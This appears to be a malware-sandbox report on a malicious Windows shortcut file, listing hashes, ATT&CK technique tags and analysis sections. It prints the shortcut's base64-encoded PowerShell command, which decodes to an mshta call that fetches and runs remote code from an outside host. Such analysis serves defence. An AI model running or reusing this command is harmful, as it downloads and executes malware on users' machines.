Malicious
Malicious

6249bc1ecc0f57fdd1069fbcf6c7fb7b

LNK File
|
MD5: 6249bc1ecc0f57fdd1069fbcf6c7fb7b
|
Size: 2.5 KB
|
application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Print
General
Structural Analysis
Config.0
Yara Rules2
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
6249bc1ecc0f57fdd1069fbcf6c7fb7b
Sha1
4fa8557fbd2d024a5041fd1fd4ac605d51aa3fde
Sha256
33bc7917b130f8405a350e5bacc78103157d20bfa2e205c34235c804427c7b60
Sha384
3803e4a6e4fe6bf9266e70300f80a7b05ede18bea10157960c339277e69c43fd53c210c9263f398c363d6cf5fa8791f9
Sha512
383870b19fff703965cc338ae745273f03f874f89b75791f8c509458245442e3863f5c30d024522656d79fd18b5a8ef84d48545827e852acec59fc47d71c6187
SSDeep
24:8Ayw/BHYVKVWf+/CWuOGqXkixaAk7GcZOBXZzJm0sHCEJMdd79dsrab7Z:8y5aBHqXkJAk7GcMJUiuMdJ9AaZ
TLSH
8251C1281AF202E9F277CB756BF977B34576FA96CD2446BC008062451622510F467E7B
File Structure
6249bc1ecc0f57fdd1069fbcf6c7fb7b
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAF4AbQBzAF4AaABeAF4AXgB0AGEAXgBeAF4AIABeAF4AXgBeAGgAXgB0AF4AXgBeAHQAcABzADoAXgBeAC8ALwBpAG4AXgB2AF4AXgBlAHMAdABeAHQAXgByAGEAZABeAF4AXgAuAF4AXgBjAG8AXgBeAF4AXgBtAF4ALwBCAF4AXgBeAGwAXgBeAF4AXgB1AGUALgBtAF4AXgBeAHAANABeAF4AXgBeAF4AJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAF4AbQBzAF4AaABeAF4AXgB0AGEAXgBeAF4AIABeAF4AXgBeAGgAXgB0AF4AXgBeAHQAcABzADoAXgBeAC8ALwBpAG4AXgB2AF4AXgBlAHMAdABeAHQAXgByAGEAZABeAF4AXgAuAF4AXgBjAG8AXgBeAF4AXgBtAF4ALwBCAF4AXgBeAGwAXgBeAF4AXgB1AGUALgBtAF4AXgBeAHAANABeAF4AXgBeAF4AJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA"
6249bc1ecc0f57fdd1069fbcf6c7fb7b (2.5 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙